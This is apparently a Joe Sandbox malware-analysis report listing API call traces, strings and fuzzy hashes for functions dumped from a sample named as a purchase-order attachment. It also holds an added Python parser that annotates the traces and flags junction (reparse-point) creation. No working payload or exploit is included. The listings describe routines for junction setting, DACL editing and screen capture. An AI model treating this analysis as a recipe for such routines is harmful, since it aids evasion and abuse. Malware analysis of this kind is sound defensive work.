                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0031E49C
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0031E4D3
                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,00319615,?), ref: 0031E4DF
                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0031E4EF
                        • DestroyIcon.USER32(?), ref: 0031E4FE
                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0031E51B
                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0031E527
                          • Part of subcall function 002D1BC7: __wcsicmp_l.LIBCMT ref: 002D1C50
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                        • String ID: .dll$.exe$.icl
                        • API String ID: 1212759294-1154884017
                        • Opcode ID: 690e1071a5be1fb027dea1a0da10276ee55180d37cddd284a1ff17fd0e22fd50
                        • Instruction ID: 8fbb38b32c3181fa640e27975c9658b84b40d3ba0f6137940e6cf11f916e7bc7
                        • Opcode Fuzzy Hash: 690e1071a5be1fb027dea1a0da10276ee55180d37cddd284a1ff17fd0e22fd50
                        • Instruction Fuzzy Hash: A061CD71510214BAEB1ADF64DC86FFA77ACAB08710F108206F915E71D0EB75A9A0DBA0
                        APIs
                        • GetLocalTime.KERNEL32(?), ref: 00300EFF
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00300F0F
                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00300F1B
                        • __wsplitpath.LIBCMT ref: 00300F79
                        • _wcscat.LIBCMT ref: 00300F91
                        • _wcscat.LIBCMT ref: 00300FA3
                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00300FB8
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00300FCC
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00300FFE
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0030101F
                        • _wcscpy.LIBCMT ref: 0030102B
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0030106A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                        • String ID: *.*
                        • API String ID: 3566783562-438819550
                        • Opcode ID: 1c12a6bee827c57fb88b2c89e406dec9205046bde480a2f29060c7cab1eeb55b
                        • Instruction ID: 3b09c5d7eb0f64b491082555180f4c3779a08f1c34b83778dabfaf6a6a0880d5
                        • Opcode Fuzzy Hash: 1c12a6bee827c57fb88b2c89e406dec9205046bde480a2f29060c7cab1eeb55b
                        • Instruction Fuzzy Hash: 93616AB6514705AFC711EF20C854A9BB3E8FF89310F00891AF989D7291EB31EA55CF92
                        APIs
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                        • CharLowerBuffW.USER32(?,?), ref: 002FDB26
                        • GetDriveTypeW.KERNEL32 ref: 002FDB73
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002FDBBB
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002FDBF2
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002FDC20
                          • Part of subcall function 002B7E53: _memmove.LIBCMT ref: 002B7EB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                        • API String ID: 2698844021-4113822522
                        • Opcode ID: 579f92dc85fb3ebc51ec4d62188c152493b88b8b96877b1737b3ad6c96e71879
                        • Instruction ID: 3c4dad1ca7c404a6f6bb949e0092be6d2f6def6a4c740d89310f64487baf34b6
                        • Opcode Fuzzy Hash: 579f92dc85fb3ebc51ec4d62188c152493b88b8b96877b1737b3ad6c96e71879
                        • Instruction Fuzzy Hash: 8A517A711243059FC700EF10C9819AAB7F9EF88798F00896DF896972A1DB71EE19CF41
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00324085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 002F3145
                        • LoadStringW.USER32(00000000,?,00324085,00000016), ref: 002F314E
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00324085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 002F3170
                        • LoadStringW.USER32(00000000,?,00324085,00000016), ref: 002F3173
                        • __swprintf.LIBCMT ref: 002F31B3
                        • __swprintf.LIBCMT ref: 002F31C5
                        • _wprintf.LIBCMT ref: 002F326C
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002F3283
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                        • API String ID: 984253442-2268648507
                        • Opcode ID: 06dcb8e5c7f90f4a855d9d6596f24e34f4e37a93aaa8d8b015720858b97a973f
                        • Instruction ID: 348d2be260d386fbc1af3b84afbacb428b385efb8e23df49c31dab571b8255ed
                        • Opcode Fuzzy Hash: 06dcb8e5c7f90f4a855d9d6596f24e34f4e37a93aaa8d8b015720858b97a973f
                        • Instruction Fuzzy Hash: 1341427191021DAACB15FB90DD87EEFB77DAF14781F200065F605B20A2DA616F28CE61
                        APIs
                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 002FD96C
                        • __swprintf.LIBCMT ref: 002FD98E
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 002FD9CB
                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 002FD9F0
                        • _memset.LIBCMT ref: 002FDA0F
                        • _wcsncpy.LIBCMT ref: 002FDA4B
                        • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 002FDA80
                        • CloseHandle.KERNEL32(00000000), ref: 002FDA8B
                        • RemoveDirectoryW.KERNEL32(?), ref: 002FDA94
                        • CloseHandle.KERNEL32(00000000), ref: 002FDA9E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                        • String ID: :$\$\??\%s
                        • API String ID: 2733774712-3457252023
                        • Opcode ID: 3b8836098b242fd048b50caf3d78b3382eec7a7c1295023a4939497466167fe3
                        • Instruction ID: a30b618a18c40d416e68c522a6de4d275cc0bb29c7ab9697907dea86dfd568c8
                        • Opcode Fuzzy Hash: 3b8836098b242fd048b50caf3d78b3382eec7a7c1295023a4939497466167fe3
                        • Instruction Fuzzy Hash: 9A31E87291020DABDB21DFA4DC89FEA77BDAF84300F0085A5F515D2160E7709A508BA1
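Added example, not part of the Joe Sandbox report and not code from the analysed sample: a Python parser for the API trace lines printed in these function listings, applied to the CreateFileW / DeviceIoControl function directly above. In that trace 000900A4 is FSCTL_SET_REPARSE_POINT and 02200000 is FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, which together with the "\??\%s" format string in the same function is the Win32 sequence for setting a junction (mount point) on a directory that was just created. The constant names, including A0000003 as IO_REPARSE_TAG_MOUNT_POINT, are documented Windows values assumed here rather than something the report states, and the argument slots in these traces are the sandbox's stack reconstruction, so the tag value is treated as corroboration rather than as a decoded parameter. The same parser handles the other blocks in this section (the constants table also covers the RegOpenKeyExW, RegConnectRegistryW and SetUserObjectSecurity operands that appear later). A listing like this shows the routine is present in the dumped image; it does not by itself show that the path ran during the analysis.

```python
"""Parse the report's 'APIs' trace lines and annotate known Win32 constants.
Added example (not the report's or the sample's code); the embedded trace is
copied from the CreateFileW/DeviceIoControl block above, and the constants
are documented Win32 values that the report itself does not name."""
from __future__ import annotations
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: the function's API trace exactly as printed in the report.
SAMPLE_TRACE = """\
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 002FD96C
• __swprintf.LIBCMT ref: 002FD98E
• CreateDirectoryW.KERNEL32(?,00000000), ref: 002FD9CB
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 002FD9F0
• _memset.LIBCMT ref: 002FDA0F
• _wcsncpy.LIBCMT ref: 002FDA4B
• DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 002FDA80
• CloseHandle.KERNEL32(00000000), ref: 002FDA8B
• RemoveDirectoryW.KERNEL32(?), ref: 002FDA94
• CloseHandle.KERNEL32(00000000), ref: 002FDA9E
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# Documented Win32 values (winioctl.h, winnt.h, fileapi.h); assumed, not from the report.
FSCTL_SET_REPARSE_POINT = 0x000900A4
IO_REPARSE_TAG_MOUNT_POINT = 0xA0000003
CREATEFILE_FLAGS = {0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
                    0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT"}
# (api, argument index) -> {value: name} for operands matched exactly.
KNOWN_ARGS = {
    ("CreateFileW", 1): {0x40000000: "GENERIC_WRITE", 0x80000000: "GENERIC_READ"},
    ("CreateFileW", 4): {3: "OPEN_EXISTING"},
    ("DeviceIoControl", 1): {FSCTL_SET_REPARSE_POINT: "FSCTL_SET_REPARSE_POINT"},
    ("RegOpenKeyExW", 3): {0x20019: "KEY_READ"},
    ("RegConnectRegistryW", 1): {0x80000002: "HKEY_LOCAL_MACHINE"},
    ("SetUserObjectSecurity", 1): {0x4: "DACL_SECURITY_INFORMATION"},
}

@dataclass
class ApiCall:
    api: str
    module: str
    args: list                      # int for hex operands, None for '?', str otherwise
    ref: int                        # call-site address
    subcall_of: Optional[int] = None

def _parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"-?[0-9A-Fa-f]{8}", tok):
        return int(tok, 16) & 0xFFFFFFFF    # '-00000001' -> 0xFFFFFFFF
    return tok

def parse_trace(text: str) -> list[ApiCall]:
    """Turn bullet lines into ApiCall records; lines that are not calls are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            raw = m.group("args")
            calls.append(ApiCall(
                api=m.group("api"), module=m.group("mod"),
                args=[_parse_arg(a) for a in raw.split(",")] if raw else [],
                ref=int(m.group("ref"), 16),
                subcall_of=int(m.group("sub"), 16) if m.group("sub") else None))
    return calls

def annotate(call: ApiCall) -> dict[int, str]:
    """Map argument index -> symbolic name for every operand whose value is known."""
    names = {}
    for idx, val in enumerate(call.args):
        if not isinstance(val, int):
            continue
        exact = KNOWN_ARGS.get((call.api, idx), {}).get(val)
        if exact:
            names[idx] = exact
        elif call.api == "CreateFileW" and idx == 5:
            bits = [n for f, n in CREATEFILE_FLAGS.items() if val & f]
            if bits:
                names[idx] = "|".join(bits)
    return names

def find_reparse_point_set(calls: list[ApiCall]) -> list[dict]:
    """Flag DeviceIoControl(FSCTL_SET_REPARSE_POINT) and pair it with the preceding
    CreateFileW that used FILE_FLAG_OPEN_REPARSE_POINT. The mount-point tag is looked
    for in any operand slot because these slots are the sandbox's stack reconstruction,
    not decoded parameters."""
    findings, opened = [], None
    for c in calls:
        if c.api == "CreateFileW" and "OPEN_REPARSE_POINT" in annotate(c).get(5, ""):
            opened = c
        elif c.api == "DeviceIoControl" and len(c.args) > 1 and c.args[1] == FSCTL_SET_REPARSE_POINT:
            findings.append({"ioctl_ref": c.ref,
                             "create_ref": opened.ref if opened else None,
                             "mount_point_tag_seen": IO_REPARSE_TAG_MOUNT_POINT in c.args})
    return findings
```

Running parse_trace over the block's own trace and feeding the result to find_reparse_point_set pairs the CreateFileW at 002FD9F0 with the DeviceIoControl at 002FDA80; paste any other "APIs" block from this section into parse_trace to get the same structured view of it.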
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                        • String ID:
                        • API String ID: 884005220-0
                        • Opcode ID: e631a0e02e3945853538317fa2ea48260026bab599c66e108674a2bb835c3860
                        • Instruction ID: 62108eac2e5bf11afcd3c5c2e94512894d6f59d7f8a0c26749727ca6d5314cd7
                        • Opcode Fuzzy Hash: e631a0e02e3945853538317fa2ea48260026bab599c66e108674a2bb835c3860
                        • Instruction Fuzzy Hash: 7461E4729B4242EFDB255F36DC41BA977ACAB01320FA00127E805D7291EB75CDE08EA4
                        APIs
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0031E564
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0031E57B
                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0031E586
                        • CloseHandle.KERNEL32(00000000), ref: 0031E593
                        • GlobalLock.KERNEL32(00000000), ref: 0031E59C
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0031E5AB
                        • GlobalUnlock.KERNEL32(00000000), ref: 0031E5B4
                        • CloseHandle.KERNEL32(00000000), ref: 0031E5BB
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0031E5CC
                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,0033D9BC,?), ref: 0031E5E5
                        • GlobalFree.KERNEL32(00000000), ref: 0031E5F5
                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 0031E619
                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0031E644
                        • DeleteObject.GDI32(00000000), ref: 0031E66C
                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0031E682
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                        • String ID:
                        • API String ID: 3840717409-0
                        • Opcode ID: 62a86ed2bc15902e4bbdd3ea2a3fe11d93af4b29c1c63cebf99a48c06b8660bd
                        • Instruction ID: 5e770ec5653d3da360c48744c33643ebd85140b274833b8816de0342e6e9ba98
                        • Opcode Fuzzy Hash: 62a86ed2bc15902e4bbdd3ea2a3fe11d93af4b29c1c63cebf99a48c06b8660bd
                        • Instruction Fuzzy Hash: 0A414975A00204AFDB129F65EC88EABBBBDEF89715F108058F906D7260D731AD40DB20
                        APIs
                        • __wsplitpath.LIBCMT ref: 00300C93
                        • _wcscat.LIBCMT ref: 00300CAB
                        • _wcscat.LIBCMT ref: 00300CBD
                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00300CD2
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00300CE6
                        • GetFileAttributesW.KERNEL32(?), ref: 00300CFE
                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00300D18
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00300D2A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                        • String ID: *.*
                        • API String ID: 34673085-438819550
                        • Opcode ID: ca836f18f192b7ed02eab819ef07e73c801dd0287dbc411651ed063a29dff792
                        • Instruction ID: 7e40deeb4059320e3006d888beaa1f96f59bdf359a34d2057a399cc2dfce5d0f
                        • Opcode Fuzzy Hash: ca836f18f192b7ed02eab819ef07e73c801dd0287dbc411651ed063a29dff792
                        • Instruction Fuzzy Hash: 5381B5715053059FD729DF68C854BABB7E8AF89310F15892EF889CB291EB30DD84CB52
                        APIs
                          • Part of subcall function 002CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 002CAF8E
                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0031ED0C
                        • GetFocus.USER32 ref: 0031ED1C
                        • GetDlgCtrlID.USER32(00000000), ref: 0031ED27
                        • _memset.LIBCMT ref: 0031EE52
                        • GetMenuItemInfoW.USER32 ref: 0031EE7D
                        • GetMenuItemCount.USER32(00000000), ref: 0031EE9D
                        • GetMenuItemID.USER32(?,00000000), ref: 0031EEB0
                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0031EEE4
                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0031EF2C
                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0031EF64
                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0031EF99
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                        • String ID: 0
                        • API String ID: 1296962147-4108050209
                        • Opcode ID: 430ad8c3351ccf17dac8685e663083a47c0cd28ad1c62aeccf5a0b0670adb767
                        • Instruction ID: fbde4fb987adceba9081d050f1c8ad407e647a4f3dbc088d0f9e9eb39e39659b
                        • Opcode Fuzzy Hash: 430ad8c3351ccf17dac8685e663083a47c0cd28ad1c62aeccf5a0b0670adb767
                        • Instruction Fuzzy Hash: 46818D71108311AFDB1ACF14D884AABBBE8FB8C354F11092DFD9997291D731D985CBA2
                        APIs
                          • Part of subcall function 002EB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 002EB903
                          • Part of subcall function 002EB8E7: GetLastError.KERNEL32(?,002EB3CB,?,?,?), ref: 002EB90D
                          • Part of subcall function 002EB8E7: GetProcessHeap.KERNEL32(00000008,?,?,002EB3CB,?,?,?), ref: 002EB91C
                          • Part of subcall function 002EB8E7: HeapAlloc.KERNEL32(00000000,?,002EB3CB,?,?,?), ref: 002EB923
                          • Part of subcall function 002EB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 002EB93A
                          • Part of subcall function 002EB982: GetProcessHeap.KERNEL32(00000008,002EB3E1,00000000,00000000,?,002EB3E1,?), ref: 002EB98E
                          • Part of subcall function 002EB982: HeapAlloc.KERNEL32(00000000,?,002EB3E1,?), ref: 002EB995
                          • Part of subcall function 002EB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002EB3E1,?), ref: 002EB9A6
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002EB5F7
                        • _memset.LIBCMT ref: 002EB60C
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002EB62B
                        • GetLengthSid.ADVAPI32(?), ref: 002EB63C
                        • GetAce.ADVAPI32(?,00000000,?), ref: 002EB679
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002EB695
                        • GetLengthSid.ADVAPI32(?), ref: 002EB6B2
                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002EB6C1
                        • HeapAlloc.KERNEL32(00000000), ref: 002EB6C8
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002EB6E9
                        • CopySid.ADVAPI32(00000000), ref: 002EB6F0
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002EB721
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002EB747
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002EB75B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                        • String ID:
                        • API String ID: 3996160137-0
                        • Opcode ID: 37a95353d47e33558e9086ee0d2ac2a1cbdaf4430ede4ec499ab6093dc3f5baa
                        • Instruction ID: 86fe07baddc3e1805449dc6f7d7bff7b61b6e074c0cb835ba112ebecebfcfd96
                        • Opcode Fuzzy Hash: 37a95353d47e33558e9086ee0d2ac2a1cbdaf4430ede4ec499ab6093dc3f5baa
                        • Instruction Fuzzy Hash: 9D516B7191024AAFDF06DFA2DC85EEEBB79FF44700F448129F915A7290DB309A25CB60
                        APIs
                        • GetDC.USER32(00000000), ref: 0030A2DD
                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0030A2E9
                        • CreateCompatibleDC.GDI32(?), ref: 0030A2F5
                        • SelectObject.GDI32(00000000,?), ref: 0030A302
                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0030A356
                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0030A392
                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0030A3B6
                        • SelectObject.GDI32(00000006,?), ref: 0030A3BE
                        • DeleteObject.GDI32(?), ref: 0030A3C7
                        • DeleteDC.GDI32(00000006), ref: 0030A3CE
                        • ReleaseDC.USER32(00000000,?), ref: 0030A3D9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                        • String ID: (
                        • API String ID: 2598888154-3887548279
                        • Opcode ID: 2cc027247c48380cba39917508b99a864b5a697f171715d57fd01727d57c3ac9
